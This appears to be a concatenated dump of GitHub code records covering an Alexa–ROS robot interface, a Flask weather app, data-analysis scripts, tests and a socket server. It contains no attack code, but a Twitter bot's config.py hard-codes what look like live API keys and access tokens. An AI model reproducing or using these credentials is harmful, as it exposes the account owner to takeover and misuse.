2주차/BOJ_1068.py","file_name":"BOJ_1068.py","file_ext":"py","file_size_in_byte":976,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18059232932","text":"#!/usr/bin/env python3\nfrom flask import Flask\nfrom ask_sdk_core.skill_builder import SkillBuilder\nfrom flask_ask_sdk.skill_adapter import SkillAdapter\nfrom ask_sdk_core.utils import is_request_type, is_intent_name\nfrom ask_sdk_core.handler_input import HandlerInput\nfrom ask_sdk_model import Response\nfrom ask_sdk_model.ui import SimpleCard\nfrom ask_sdk_core.dispatch_components import AbstractRequestHandler, AbstractExceptionHandler\nfrom arduinobot_msgs.action import ArduinobotTask\nimport rclpy\nfrom rclpy.node import Node\nimport threading\nfrom rclpy.action import ActionClient\n\nthreading.Thread(target=lambda: rclpy.init()).start()\naction_client = ActionClient(Node('alexa_interface'), ArduinobotTask, \"task_server\")\n\napp = Flask(__name__)\n\n\nclass LaunchRequestHandler(AbstractRequestHandler):\n def can_handle(self, handler_input):\n # type: (HandlerInput) -> bool\n return is_request_type(\"LaunchRequest\")(handler_input)\n\n def handle(self, handler_input):\n # type: (HandlerInput) -> Response\n speech_text = \"Hi, how can we help?\"\n\n handler_input.response_builder.speak(speech_text).set_card(\n SimpleCard(\"Online\", speech_text)).set_should_end_session(\n False)\n\n goal = ArduinobotTask.Goal()\n goal.task_number = 0\n action_client.send_goal_async(goal)\n\n return handler_input.response_builder.response\n\n\nclass PickIntentHandler(AbstractRequestHandler):\n def can_handle(self, handler_input):\n # type: (HandlerInput) -> bool\n return is_intent_name(\"PickIntent\")(handler_input)\n\n def handle(self, handler_input):\n # type: (HandlerInput) -> Response\n speech_text = \"Ok, I'm moving\"\n\n handler_input.response_builder.speak(speech_text).set_card(\n SimpleCard(\"Pick\", speech_text)).set_should_end_session(\n True)\n\n goal = ArduinobotTask.Goal()\n goal.task_number = 1\n action_client.send_goal_async(goal)\n\n return handler_input.response_builder.response\n\n\nclass SleepIntentHandler(AbstractRequestHandler):\n def can_handle(self, handler_input):\n # type: (HandlerInput) -> bool\n return is_intent_name(\"SleepIntent\")(handler_input)\n\n def handle(self, handler_input):\n # type: (HandlerInput) -> Response\n speech_text = \"Ok, see you later\"\n\n handler_input.response_builder.speak(speech_text).set_card(\n SimpleCard(\"Sleep\", speech_text)).set_should_end_session(\n True)\n\n goal = ArduinobotTask.Goal()\n goal.task_number = 2\n action_client.send_goal_async(goal)\n\n return handler_input.response_builder.response\n\n\nclass WakeIntentHandler(AbstractRequestHandler):\n def can_handle(self, handler_input):\n # type: (HandlerInput) -> bool\n return is_intent_name(\"WakeIntent\")(handler_input)\n\n def handle(self, handler_input):\n # type: (HandlerInput) -> Response\n speech_text = \"Hi, I am ready\"\n\n handler_input.response_builder.speak(speech_text).set_card(\n SimpleCard(\"Wake\", speech_text)).set_should_end_session(\n True)\n \n goal = ArduinobotTask.Goal()\n goal.task_number = 0\n action_client.send_goal_async(goal)\n\n return handler_input.response_builder.response\n\n\nclass AllExceptionHandler(AbstractExceptionHandler):\n\n def can_handle(self, handler_input, exception):\n # type: (HandlerInput, Exception) -> bool\n return True\n\n def handle(self, handler_input, exception):\n # type: (HandlerInput, Exception) -> Response\n\n speech = \"Hmm, I don't know that. Can you please say it again?\"\n handler_input.response_builder.speak(speech).ask(speech)\n return handler_input.response_builder.response\n\n\nskill_builder = SkillBuilder()\nskill_builder.add_request_handler(LaunchRequestHandler())\nskill_builder.add_request_handler(PickIntentHandler())\nskill_builder.add_request_handler(SleepIntentHandler())\nskill_builder.add_request_handler(WakeIntentHandler())\nskill_builder.add_exception_handler(AllExceptionHandler())\n\n\nskill_adapter = SkillAdapter(\n skill=skill_builder.create(), \n skill_id=\"SKILL-ID\",\n app=app)\n\n\nskill_adapter.register(app=app, route=\"/\")\n\n\nif __name__ == '__main__':\n app.run()","repo_name":"AntoBrandi/Arduino-Bot","sub_path":"arduinobot_ws/src/arduinobot_remote/arduinobot_remote/alexa_interface.py","file_name":"alexa_interface.py","file_ext":"py","file_size_in_byte":4293,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"53"} +{"seq_id":"7955213703","text":"from setuptools import setup, find_packages\n\ndef read_requires():\n with open(\"requirements.txt\", \"rt\") as req_f:\n requirements = []\n for req in req_f.readlines():\n requirements.append(req)\n return requirements\n\nsetup(\n name='Doors-Task',\n version='1.0.0',\n packages=find_packages(),\n url='',\n license='',\n author='odayan',\n author_email='',\n description='',\n python_requires='>=3.8.6',\n install_requires=read_requires()\n)\n","repo_name":"omerday/Doors-Task","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":483,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20905946947","text":"import pymongo\nimport os\n\n# mongodb config variables\nMONGO_HOST = None\nMONGO_PORT = None\ndatabase_name = \"twitterflash\"\ncollection_name = \"schedule\"\ncollection_dates = \"latest_dates\"\ncollection_fixtures = \"fixtures\"\n\n# defining connection to database\ndb_connection = pymongo.MongoClient(MONGO_HOST, MONGO_PORT, connect=False)\n\n# api for getting present day match schedule\nmatch_schedule_url = 'http://scoreslb-822670678.ap-northeast-2.elb.amazonaws.com/v1/get_all_matches_list'\n\n# urls for APIs for all Sports, use format to replace params in {}\n# cricket_url = \"http://52.74.75.79:8080/v1/get_match_commentary?match_id={match_id}&season_key={series_id}\"\ncricket_url = \"http://scoreslb-822670678.ap-northeast-2.elb.amazonaws.com/v1/get_match_commentary?match_id={match_id}&season_key={series_id}\"\nfootball_url = \"http://scoreslb-822670678.ap-northeast-2.elb.amazonaws.com/get_football_commentary?match_id={match_id}\"\nbasketball_url = ''\nf1_url = ''\ntennis_url = ''\n\n# twitter app credentials\ntwitter_cons_key = '0448wNvDBQpBuUSUtYMspkxld'\ntwitter_cons_secret = 'QA0sKvyi3Qfg5J07GkYoWE7BbYW23LW8aRXbtKJZi2rggDnLxB'\ntwitter_access_token = '707458521462382594-nHgEfXOiSlgZmj6iuzTTIVAT6Pon7FJ'\ntwitter_access_token_secret = 'YuCQSoS6btI0YdCk9aTtK28YHox7WbNOFyxBQf9ta0Nnj'\n\n# twitter test app credentials\n# twitter_cons_key = 'DCgP6jqWaqnpXXDNHsusTz68t'\n# twitter_cons_secret = 'WsN6DOc9rNsO3Fu4rc1DH511mxq5KOzh8kzJ4cEtZvHrUGTCwm'\n# twitter_access_token = '208713780-3czsVI3ZJV0BkxtJfk2eOjK6AUMDeVnfbZSmlOyG'\n# twitter_access_token_secret = 'cikeVIINYC8z1CZAohQiykXsin4VtTkhuyduEiC63yuMj'\n\n\n# log files\nlogs_dir = os.getcwd()+'/logs'\nstd_err_log_file = logs_dir+'/'+'twitterflash_std_logs.log'\n\n\n# time interval to run tasks (in seconds)\ntime_interval = 10\n\n# exit count variable; i.e. till when\n# the program waits for new update\n# here it is set to 40 minutes; \nterminate_task_at = (40*60)/time_interval\n\n\n","repo_name":"SportsUnity/twitter_bot","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1903,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14536847463","text":"from flask import Flask, render_template, request, redirect\nimport json, requests, sys, smtplib, pdb\nfrom flask_wtf import Form\nfrom flask_mail import Mail, Message\nfrom wtforms import StringField, TextAreaField, SubmitField, validators\napp = Flask(__name__)\nimport jinja2\nenv = jinja2.Environment()\nenv.globals.update(zip=zip)\napp.config['MAIL_SERVER'] = 'smtp.aynst.in'\napp.config['MAIL_PORT'] = 587\napp.config['MAIL_USE_SSL'] = False\napp.config['MAIL_USE_TLS'] = True\napp.config['MAIL_USERNAME'] = '--EMAIL--'\napp.config['MAIL_PASSWORD'] = '**PASSWORD**'\n\nclass ContactForm(Form):\n\temail = StringField('Your e-mail address:')\n\tsubmit = SubmitField('SUBSCRIBE')\n\nmail = Mail(app)\n\n@app.route('/')\ndef home():\n\treturn render_template('index.html')\n\n\n@app.route('/place' ,methods = ['POST', 'GET'])\ndef locate():\n\tcity = request.form['place']\n\ttypeof = request.form.get('menu')\n\tlocation = city\n\turl = 'http://api.openweathermap.org/data/2.5/weather?q=%s&APPID=--APIKEY--&units=metric' % (location)\n\tweatherResponse = requests.get(url)\n\tweatherResponse.raise_for_status()\n\tcity = city.title()\n\t#Load JSON Data into a python variable\n\tweatherData = json.loads(weatherResponse.text)\n\n\t#Weather descrptions\n\tw = weatherData\n\tcountry = w['sys']['country']\n\tcurr = w['weather'][0]['description']\n\tcurr = curr.title()\n\ticon = w['weather'][0]['icon']\n\ttempNow = w['main']['temp']\n\ttempNow = str(tempNow)[:2]\n\twindSpeed = w['wind']['speed']\n\thumidity = w['main']['humidity']\n\ttemp_min = w['main']['temp_min']\n\ttemp_max = w['main']['temp_max']\n\t#iconLink = 'giphy.gif'\n\tif icon == '01d':\n\t\ticonLink = 'sunny.png'\n\telif icon == '02d':\n\t\ticonLink = 'sunshine.png'\n\telif icon == '03d':\n\t\ticonLink = 'cloudy.png'\n\telif icon == '04d':\n\t\ticonLink = 'cloud1.png'\n\telif icon == '10d':\n\t\ticonLink = 'rainy.png'\n\telif icon == '10n':\n\t\ticonLink = 'rainy.png'\n\telif icon == '01n':\n\t\ticonLink = 'foggy.png'\n\telif icon == '03n':\n\t\ticonLink = 'night cloud.png'\n\telif icon == '02n':\n\t\ticonLink = 'clouds.png'\n\telif icon == '04n':\n\t\ticonLink = 'few clouds.png'\n\telif icon == '50n':\n\t\ticonLink = 'haze.png'\n\telse:\n\t\ticonLink = 'giphy.gif'\n\n\t#Get places\n\n\turl = 'https://maps.googleapis.com/maps/api/geocode/json?address='+location+'&key=--APIKEY--'\n\tgpsResponse = requests.get(url)\n\tgpsResponse.raise_for_status()\n\tgps = json.loads(gpsResponse.text)\n\tfullName = gps['results'][0]['formatted_address']\n\tlat = gps['results'][0]['geometry']['location']['lat']\n\tlng = gps['results'][0]['geometry']['location']['lng']\n\tfullName = fullName.title()\n\n\t#Get location data from Google Places API\n\n\turl='https://maps.googleapis.com/maps/api/place/nearbysearch/json?location='+str(lat)+','+str(lng)+'&type='+ str(typeof) +'&rankby=distance&key=--APIKEY--'\n\tplacesResponse = requests.get(url)\n\tplacesResponse.raise_for_status()\n\tplaces = json.loads(placesResponse.text)\n\tp = places\n\tnameList = []\t\t #stores names\n\tratingList = []\t\t#stores ratings\n\tphotosList = []\t\t#stores photo reference\n\tplaceURLList = []\t #stores photos\n\taddressList = []\n\n\t#Get place name\n\tfor i in range(0,19):\n\t\tif 'photos' in p['results'][i]:\n\t\t\tpref = p['results'][i]['photos'][0]['photo_reference']\n\t\t\tphotosList.insert(i, p['results'][i]['photos'])\n\t\t\tplaceURLList.insert(i,'https://maps.googleapis.com/maps/api/place/photo?maxwidth=400&photoreference='+pref+'&key=--APIKEY--')\n\t\telse:\n\t\t\tplaceURLList.insert(i,'http://placehold.it/158x158')\n\t\tif 'name' in p['results'][i]:\n\t\t\tnameList.insert(i,p['results'][i]['name'])\n\t\t\tif 'rating' in places['results'][i]:\n\t\t\t\tratingList.insert(i,p['results'][i]['rating'])\n\t\t\telse:\n\t\t\t\tratingList.insert(i,'NA')\n\t\t\tif 'vicinity' in p['results'][i]:\n\t\t\t\taddressList.insert(i, p['results'][i]['vicinity'])\n\n\n\t#iconLink = 'http://openweathermap.org/img/w/'+icon+'.png'\n\treturn render_template('index.html', lat=lat, lng=lng, fullName=fullName, city=city, curr=curr, icon=icon, tempNow=tempNow, windSpeed=windSpeed, iconLink=iconLink, humidity=humidity, tempList = zip(nameList, ratingList, placeURLList, addressList), typeof = typeof, temp_min = temp_min, temp_max = temp_max)\n\n@app.route('/about')\ndef about():\n\treturn render_template('about.html')\n\n@app.route('/contact')\ndef contact():\n\treturn render_template('contact.html')\n\n@app.route('/confirmation')\ndef sub():\n\treturn render_template('success.html')\n\n@app.route('/privacy')\ndef privacy():\n\treturn render_template('privacy.html')\n\n@app.route('/conditions')\ndef conditions():\n\treturn render_template('conditions.html')\n\n@app.route('/play')\ndef playground():\n\treturn render_template('play.html')\n\n@app.route('/sitemap')\ndef sitemap():\n\treturn render_template('sitemap.xml')\n\n@app.route('/construct', methods = ['POST', 'GET'])\ndef construction():\n\tform = ContactForm()\n\tif request.method == 'POST':\n\t\t\tmsg = Message(\"Message from your visitor\",\n\t\t\t\t\t\t sender='--EMAIL--',\n\t\t\t\t\t\t recipients=['--RECIPIENTS EMAIL--'])\n\t\t\tmsg.body = \"\"\"\n\t\t\tFrom: <%s>\n\t\t\t\"\"\" % (form.email.data)\n\t\t\tmail.send(msg)\n\t\t\treturn redirect('confirmation')\n\n\telif request.method == 'GET':\n\t\treturn render_template('construct.html', form=form)\n\n@app.errorhandler(500)\ndef internal_server_error(e):\n return render_template('500.html'), 500\n\n@app.errorhandler(404)\ndef notFound(e):\n\treturn render_template('404.html'), 404\n\n@app.errorhandler(400)\ndef forbidden(e):\n\treturn render_template('400.html'), 403\n\nif __name__ == '__main__':\n\tapp.run(threaded=True)\n","repo_name":"Aayush-N/aynst","sub_path":"app/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5362,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29260850298","text":"#analyze how close the different APIs are, the output file can be found in the root directory\n# of this project \"weather_api_comp_output.txt\"\nimport pandas as pd\nimport scipy.stats as stats\nimport os\nimport abstract_weather_api\nimport numpy as np\nimport itertools\nweather_kinds = vars(abstract_weather_api.WeatherInformation()).keys()\nweather_kinds_ignore = {\"time\", \"last_updated\", \"location\", \"sun_rise\", \"description\", \"sun_set\"}\nweather_kinds = [w for w in weather_kinds if w not in weather_kinds_ignore]\nweather_api={t.__name__ for t in abstract_weather_api.apis_dict_reversed}\nweather_api=weather_api-{\"AccuWeather\",\"Meteomatics\"}\n\nprecision={\n \"temperature\":5,\n \"rain\":1,\n \"humidity\":5,\n \"wind_speed\":10,\n \"air_pressure\":1,\n \"thunder\":1\n}\nINVALID=-1000\ndef round_down(m, n):\n if n ==0:\n return m\n return m // n * n\npairs=[a for a in itertools.product(weather_api,weather_api) if a[0]!=a[1]]\nOUTLINERS_SIGNIFICANCE=0.05\nDIFF_SIGNIFICANCE=0.1\nweather_comp_stats=dict()\napi_similar=dict()\nfor w in os.listdir(\"time_series\"):\n df=pd.read_csv(\"time_series/\"+w,delimiter=\";\")\n \n for p1,p2 in pairs:\n if p1 not in df or p2 not in df:\n continue\n filtered=[x for x in zip(df[p1],df[p2]) if x[0]!=INVALID and x[1]!=INVALID]\n filtered1=[x[0] for x in filtered]\n filtered2=[x[1] for x in filtered]\n \n # df[p1]=df.apply(lambda row: round_down(row[p1],precision[w]),axis=1)\n #df[p2]=df.apply(lambda row: round_down(row[p2],precision[w]),axis=1)\n #print(np.max(np.abs(df[p1]-df[p2])))\n try:\n mx=np.nanmax(filtered)\n mn=np.nanmin(filtered)\n span=mx-mn\n if np.isnan(span):\n continue\n #print(\"Length\",len(filtered))\n #print(\"span\",p1,p2,w,mx,mn,span)\n rel_diff=[abs(x[0]-x[1])/span for x in filtered]\n # only outliers, that is values that differ more than 10%, must be analyzed further\n outliers_share=len([r for r in rel_diff if r >=DIFF_SIGNIFICANCE])/len(rel_diff)\n if w.startswith(\"humidity\"):\n print(\"Humidity\",p1,p2,mx,mn,span,outliers_share,np.nanmax(rel_diff))\n if outliers_share 0:\n if w not in weather_comp_stats:\n weather_comp_stats[w]=[]\n api_similar[w]=set()\n weather_comp_stats[w]+=[(p1,p2,mx,mn,span,outliers_share)]\n api_similar[w]=api_similar[w] | {p1, p2}\n except Exception as ex:\n raise ex\nprint(\"#\"*100)\nfor k in weather_comp_stats:\n print(k)\n for x in weather_comp_stats[k]:\n print(x)\n print(api_similar[k])\n print()\n\n \n","repo_name":"compf/uos_measurement_project","sub_path":"api_data_comp.py","file_name":"api_data_comp.py","file_ext":"py","file_size_in_byte":2765,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"25531469159","text":"\"\"\"Test cases for responses\"\"\"\nimport unittest\nfrom jma.response import JmaIrradiationResponse, JmaHourlyIrradiationResponse\n\nclass TestJmaIrradiationResponse(unittest.TestCase):\n def setUp(self):\n self.csv_data = '''ダウンロードした时刻:2021/01/10 15:53:37\n\n,福冈,佐贺,长崎\n,合计全天日射量(MJ/㎡),合计全天日射量(MJ/㎡),合计全天日射量(MJ/㎡)\n2021年1月1日,2.53,6.95,5.71\n2021年1月2日,1.07,3.56,4.54\n2021年1月3日,11.01,11.68,10.94\n2021年1月4日,12.33,12.31,11.71\n2021年1月5日,6.30,5.02,5.27\n2021年1月6日,5.45,5.58,5.04\n'''\n self.csv_data_with_lta = '''ダウンロードした时刻:2021/01/11 00:34:52\n\n,盛冈,盛冈,秋田,秋田\n,合计全天日射量(MJ/㎡),合计全天日射量(MJ/㎡),合计全天日射量(MJ/㎡),合计全天日射量(MJ/㎡)\n,,平年値(MJ/㎡),,平年値(MJ/㎡)\n2021年1月1日,4.01,5.9,2.46,4.0\n2021年1月2日,8.16,5.9,2.44,4.0\n'''\n\n self.csv_data_incomplete = '''ダウンロードした时刻:2021/01/10 23:54:52\n\n,山口,山口,松江,松江\n,合计全天日射量(MJ/㎡),合计全天日射量(MJ/㎡),合计全天日射量(MJ/㎡),合计全天日射量(MJ/㎡)\n,,平年値(MJ/㎡),,平年値(MJ/㎡)\n2021年1月1日,,,5.85,\n2021年1月2日,,,3.58,\n'''\n\n def test_parse_headers(self):\n response = JmaIrradiationResponse(self.csv_data)\n expected = ['Date', 'Fukuoka', 'Saga', 'Nagasaki']\n self.assertListEqual(expected, response.headers)\n\n def test_parse_headers_lta(self):\n response = JmaIrradiationResponse(self.csv_data_with_lta)\n expected = ['Date', 'Morioka', 'Morioka_LT', 'Akita', 'Akita_LT']\n self.assertListEqual(expected, response.headers)\n\n \n def test_parse_data(self):\n response = JmaIrradiationResponse(self.csv_data)\n expected = [\n [2.53, 6.95, 5.71],\n [1.07, 3.56, 4.54],\n [11.01, 11.68, 10.94],\n [12.33, 12.31, 11.71],\n [6.30, 5.02, 5.27],\n [5.45, 5.58, 5.04],\n ]\n for i, row in enumerate(response.csv):\n self.assertAlmostEqual(row['Fukuoka'], expected[i][0], 3)\n self.assertAlmostEqual(row['Saga'], expected[i][1], 3)\n self.assertAlmostEqual(row['Nagasaki'], expected[i][2], 3)\n\n def test_parse_data_lta(self):\n response = JmaIrradiationResponse(self.csv_data_with_lta)\n expected = [\n [4.01, 5.9, 2.46, 4.0],\n [8.16, 5.9, 2.44, 4.0],\n ]\n for i, row in enumerate(response.csv):\n self.assertAlmostEqual(row['Morioka'], expected[i][0], 3)\n self.assertAlmostEqual(row['Morioka_LT'], expected[i][1], 3)\n self.assertAlmostEqual(row['Akita'], expected[i][2], 3)\n self.assertAlmostEqual(row['Akita_LT'], expected[i][3], 3)\n \n def test_parse_data_kwh(self):\n response = JmaIrradiationResponse(self.csv_data, kwh=True)\n expected = [\n [0.70277, 1.930555555, 1.58611],\n [0.29722, 0.988888, 1.2611],\n [3.058333, 3.2444, 3.0388],\n [3.425, 3.41944, 3.2527],\n [1.75, 1.39444, 1.46388],\n [1.513888, 1.55, 1.4]\n ]\n for i, row in enumerate(response.csv):\n self.assertAlmostEqual(row['Fukuoka'], expected[i][0], 3)\n self.assertAlmostEqual(row['Saga'], expected[i][1], 3)\n self.assertAlmostEqual(row['Nagasaki'], expected[i][2], 3)\n\n def test_parse_data_lta_kwh(self):\n response = JmaIrradiationResponse(self.csv_data_with_lta, kwh=True)\n expected = [\n [1.113888, 1.638888, 0.68333, 1.11111],\n [2.266666, 1.638888, 0.67777, 1.11111],\n ]\n for i, row in enumerate(response.csv):\n self.assertAlmostEqual(row['Morioka'], expected[i][0], 3)\n self.assertAlmostEqual(row['Morioka_LT'], expected[i][1], 3)\n self.assertAlmostEqual(row['Akita'], expected[i][2], 3)\n self.assertAlmostEqual(row['Akita_LT'], expected[i][3], 3)\n\n def test_parse_dates(self):\n response = JmaIrradiationResponse(self.csv_data)\n dates = [row['Date'] for row in response.csv]\n for i, date in enumerate(dates):\n self.assertEqual(f'2021-01-{i+1:02}', date)\n\n def test_parse_data_incomplete_kwh(self):\n response = JmaIrradiationResponse(self.csv_data_incomplete, kwh=True)\n row0 = response.csv[0]\n row1 = response.csv[1]\n self.assertAlmostEqual(row0['Matsue'], 1.624999, 3)\n self.assertAlmostEqual(row1['Matsue'], 0.994444, 3)\n self.assertIsNone(row0['Matsue_LT'])\n self.assertIsNone(row1['Matsue_LT'])\n self.assertIsNone(row0['山口'])\n self.assertIsNone(row1['山口'])\n self.assertIsNone(row0['山口_LT'])\n self.assertIsNone(row1['山口_LT'])\n\n\nclass TestJmaHourlyIrradiationResponse(unittest.TestCase):\n def setUp(self):\n self.csv_data = '''ダウンロードした时刻:2021/03/24 21:40:23\n\n,青森\n,日射量(MJ/�u)\n2021年3月22日1时,--\n2021年3月22日2时,--\n2021年3月22日3时,--\n2021年3月22日4时,--\n2021年3月22日5时,--\n2021年3月22日6时,0.00\n2021年3月22日7时,0.08\n2021年3月22日8时,0.42\n2021年3月22日9时,0.70\n2021年3月22日10时,0.59\n2021年3月22日11时,1.03\n2021年3月22日12时,1.56\n2021年3月22日13时,0.58\n2021年3月22日14时,0.46\n2021年3月22日15时,0.42\n2021年3月22日16时,0.30\n2021年3月22日17时,0.37\n2021年3月22日18时,0.08\n2021年3月22日19时,0.00\n2021年3月22日20时,--\n2021年3月22日21时,--\n2021年3月22日22时,--\n2021年3月22日23时,--\n2021年3月22日24时,--\n'''\n\n def test_parse_times(self):\n response = JmaHourlyIrradiationResponse(self.csv_data)\n for hour in range(24):\n row = response.csv[hour]\n self.assertEqual(f'2021-03-22 {hour:02}:00', row['Date'])\n\n def test_parse_values(self):\n response = JmaHourlyIrradiationResponse(self.csv_data)\n expected = [None, None, None, None, None, 0.00, 0.08, 0.42, 0.70, 0.59, 1.03, 1.56,\n 0.58, 0.46, 0.42, 0.30, 0.37, 0.08, 0.00, None, None, None, None, None]\n\n for i, row in enumerate(response.csv):\n actual = row['Aomori']\n if actual is None:\n self.assertIsNone(expected[i])\n else:\n self.assertAlmostEqual(expected[i], actual)\n","repo_name":"dliberat/jma-client","sub_path":"jma/tests/test_response.py","file_name":"test_response.py","file_ext":"py","file_size_in_byte":6418,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72878885608","text":"#link: https://codeforces.com/problemset/problem/1350/A\n#author: Mohamed Ibrahim\n\nt=int(input())\nfor i in range(t):\n\tn,k=map(int,input().split())\n\tans=0\n\tfor i in range(2,n+1):\n\t\tif(n%i==0):\n\t\t\tans=i\n\t\t\tbreak;\n\tprint(n+ans+(k-1)*2)\n","repo_name":"M0hamedIbrahim1/Problem-Solving-Python-","sub_path":"CodeForces/Orac and Factors.py","file_name":"Orac and Factors.py","file_ext":"py","file_size_in_byte":234,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"53"} +{"seq_id":"33461842022","text":"\"\"\"Tests for helper classes.\"\"\"\nimport unittest\n\nimport xmlschema\n\nfrom metadata_backend.conf.conf import schema_types\nfrom metadata_backend.helpers.schema_loader import JSONSchemaLoader, SchemaNotFoundException, XMLSchemaLoader\n\n\nclass TestXMLSchemaLoader(unittest.TestCase):\n \"\"\"Test schema loader.\"\"\"\n\n def test_XMLSchemaLoader_returns_xmlschema_object(self):\n \"\"\"Test XMLSchemaLoader return type is correct.\"\"\"\n schema_name = \"submission\"\n schemaloader = XMLSchemaLoader()\n schema = schemaloader.get_schema(schema_name)\n self.assertIs(type(schema), xmlschema.XMLSchema)\n\n def test_XMLSchemaLoader_raises_error_with_nonexistent_schema(self):\n \"\"\"Test non-existent schemas is reported as error.\"\"\"\n schema_name = \"NULL\"\n schemaloader = XMLSchemaLoader()\n self.assertRaises(SchemaNotFoundException, schemaloader.get_schema, schema_name)\n\n\nclass TestJSONSchemaLoader(unittest.TestCase):\n \"\"\"Test schema loader.\"\"\"\n\n def test_JSONSchemaLoader_returns_xmlschema_object(self):\n \"\"\"Test JSONSchemaLoader return type is correct.\"\"\"\n schema_name = \"study\"\n schemaloader = JSONSchemaLoader()\n schema = schemaloader.get_schema(schema_name)\n self.assertIs(type(schema), dict)\n\n def test_JSONSchemaLoader_raises_error_with_nonexistent_schema(self):\n \"\"\"Test non-existent schemas is reported as error.\"\"\"\n schema_name = \"NULL\"\n schemaloader = JSONSchemaLoader()\n self.assertRaises(SchemaNotFoundException, schemaloader.get_schema, schema_name)\n\n\nclass TestAllDefinedSchemasExist(unittest.TestCase):\n \"\"\"Test that all defined schemas exist.\"\"\"\n\n def test_schemas_exist(self):\n \"\"\"Test that all defined schemas have their schema definition.\"\"\"\n schema_loader = JSONSchemaLoader()\n for schema_name in schema_types.keys():\n if schema_name in {\"project\", \"datacite\"}:\n continue\n schema = schema_loader.get_schema(schema_name)\n self.assertIs(type(schema), dict)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"CSCfi/metadata-submitter","sub_path":"tests/unit/test_schema_loader.py","file_name":"test_schema_loader.py","file_ext":"py","file_size_in_byte":2113,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"74010800809","text":"#!/usr/bin/env python\nimport socket\n\nfrom variableDef import variableAssign, list\n\nfrom expressions import doMath\n\nTCP_IP = '127.0.0.1'\nTCP_PORT = 5005 #port our app will listen on\nBUFFER_SIZE = 100 #the max size of the command by the user\n\n#starts up server with the correct specifications\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ns.bind((TCP_IP, TCP_PORT))\ns.listen(1)\n\nconn, addr = s.accept()\nprint ('Connection address:', addr)\n\n#server will stay up as long as user is connected, and will stop on disconnect (can change it if you would like)\nwhile 1:\n senddata = True\n data = conn.recv(BUFFER_SIZE)\n data1 = data.strip()\n if not data: break\n print (\"received data:\", data)\n #checks to see if user inputed an existing variable to see value\n for obj in list:\n #print(\"test\")\n if data1 == obj.name:\n conn.send(obj.value + \"\\n\")\n senddata = False\n #checks to see if the user inputed availible commands\n if data1.lower() == 'author':\n conn.send('Oliver Fay\\n')\n elif data1.lower() == 'hello':\n conn.send('world\\n')\n elif data1.lower() == 'help':\n conn.send('This is my command line tool\\nTo find out the author type: Author\\nTo get a response type: Hello\\nTo assign variables use the format = \\nTo perform mathmatical exprestions separate your numbers with +, -, *, /, **\\n')\n elif data1.lower() == 'oliver':\n conn.send('you did it\\n')\n elif not data1.find('=') == -1:\n conn.send(variableAssign(data1))\n #will run the command as a math expression if nothing else is outputed\n elif senddata:\n #print(\"test3\")\n conn.send(doMath(data1))\n #conn.send(data1 + '\\n') # echo","repo_name":"OFay41/checkWritersTechnical","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1742,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73368084968","text":"from suffix_trees import STree\nimport re\n\ndef load_file(file_name):\n f = open(file_name)\n # lines = re.findall(r\"'''\\s*(\\w+)\\s*'''\", f.read())\n lines = f.readlines()\n f.close()\n return lines\n\nlines = load_file('test2.txt')\nlcs_str = STree.STree(lines)\nprint(lcs_str.lcs())","repo_name":"Anastasiya-Safrygina/Lab-4","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":287,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70350555367","text":"import logging\nfrom pathlib import Path\nfrom types import GeneratorType\n\nimport pytest\n\nfrom promptflow._sdk._constants import LOGGER_NAME\nfrom promptflow._sdk._pf_client import PFClient\nfrom promptflow.exceptions import UserErrorException\n\nPROMOTFLOW_ROOT = Path(__file__) / \"../../../..\"\n\nTEST_ROOT = Path(__file__).parent.parent.parent\nMODEL_ROOT = TEST_ROOT / \"test_configs/e2e_samples\"\nCONNECTION_FILE = (PROMOTFLOW_ROOT / \"connections.json\").resolve().absolute().as_posix()\nFLOWS_DIR = (TEST_ROOT / \"test_configs/flows\").resolve().absolute().as_posix()\nFLOW_RESULT_KEYS = [\"category\", \"evidence\"]\n\n_client = PFClient()\n\n\n@pytest.mark.usefixtures(\"use_secrets_config_file\", \"setup_local_connection\", \"install_custom_tool_pkg\")\n@pytest.mark.sdk_test\n@pytest.mark.e2etest\nclass TestFlowTest:\n def test_pf_test_flow(self):\n inputs = {\"url\": \"https://www.youtube.com/watch?v=o5ZQyXaAv1g\", \"answer\": \"Channel\", \"evidence\": \"Url\"}\n flow_path = Path(f\"{FLOWS_DIR}/web_classification\").absolute()\n\n result = _client.test(flow=flow_path, inputs=inputs)\n assert all([key in FLOW_RESULT_KEYS for key in result])\n\n result = _client.test(flow=f\"{FLOWS_DIR}/web_classification\")\n assert all([key in FLOW_RESULT_KEYS for key in result])\n\n def test_pf_test_flow_with_custom_strong_type_connection(self, install_custom_tool_pkg):\n # Need to reload pkg_resources to get the latest installed tools\n import importlib\n\n import pkg_resources\n\n importlib.reload(pkg_resources)\n\n inputs = {\"text\": \"Hello World!\"}\n flow_path = Path(f\"{FLOWS_DIR}/custom_strong_type_connection_basic_flow\").absolute()\n\n # Test that connection would be custom strong type in flow\n result = _client.test(flow=flow_path, inputs=inputs)\n assert result == {\"out\": \"connection_value is MyFirstConnection: True\"}\n\n # Test that connection\n result = _client.test(flow=flow_path, inputs={\"input_text\": \"Hello World!\"}, node=\"My_Second_Tool_usi3\")\n assert result == \"Hello World!This is my first custom connection.\"\n\n 